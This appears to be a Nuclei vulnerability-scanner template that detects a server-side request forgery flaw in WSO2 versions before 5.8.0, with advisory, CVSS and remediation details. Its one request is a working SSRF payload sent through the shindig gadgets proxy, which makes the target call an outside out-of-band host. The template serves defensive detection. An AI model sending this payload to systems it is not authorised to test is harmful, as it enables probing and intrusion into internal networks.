id: WSO2-2019-0598 info: name: WSO2 <5.8.0 - Server Side Request Forgery author: Amnotacat severity: medium description: | WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 remediation: | Upgrade the product version to 5.8.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 6.8 cwe-id: CWE-918 tags: ssrf,wso2,shindig requests: - method: GET path: - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro" matchers-condition: and matchers: - type: word words: - "Interactsh Server" - type: status status: - 200 # Enhanced by mp on 2022/05/26